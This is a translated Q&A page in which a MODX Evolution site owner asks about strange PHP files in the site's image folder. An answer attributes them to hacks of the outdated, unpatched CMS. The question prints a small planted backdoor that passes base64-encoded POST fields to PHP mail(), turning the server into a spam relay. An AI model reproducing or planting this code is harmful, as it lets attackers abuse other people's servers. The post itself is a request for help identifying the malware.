MODX evo - 资产图片文件夹中的这些错误?

时间:2017-05-07 18:00:35

标签: php modx modx-evolution

我的modx资产中有奇怪的php文件 - >图像

enter image description here 

cklxt.php.php.php.php
cklxt.php.php.php.php.php

如果我打开它们,代码似乎与图像无关:

<?php 
$ixhpq = stripslashes(base64_decode($_POST['gqujwdb'])); 
$xuoh = stripslashes(base64_decode($_POST['maih'])); 
$iglrhrluhvqgr = stripslashes(base64_decode($_POST['mepouebon']));  
$yflalhugo = stripslashes(base64_decode($_POST['cdcftxzkyrg']));  
$nzcbxor = mail(stripslashes($ixhpq), stripslashes($xuoh), stripslashes($iglrhrluhvqgr), stripslashes($yflalhugo));
if($nzcbxor){echo 'nlewxnrsdqxow';} else {echo 'qhguq : ' . $nzcbxor;}

还有更多......

这些php文件应该在那里吗?或者他们是错误还是该网站被黑了?

1 个答案:

答案 0 :(得分:1)

MODX不再正式支持Evolution CMS。早在11月,就出现了一系列糟糕的黑客攻击,负责代码库的社区响应缓慢。最终,一个补丁被发布,但随之而来的还有数百个其他代码更改。有许多临时解决方案可以防止这些黑客攻击,但最好咨询一个进化开发人员以使您的网站恢复正常。

我不会责怪应用程序,因为它已超过11年,并且只有大约12个CVE。它刚刚过时,没有打补丁,已经被Revolution取代了将近五年。

相关问题
最新问题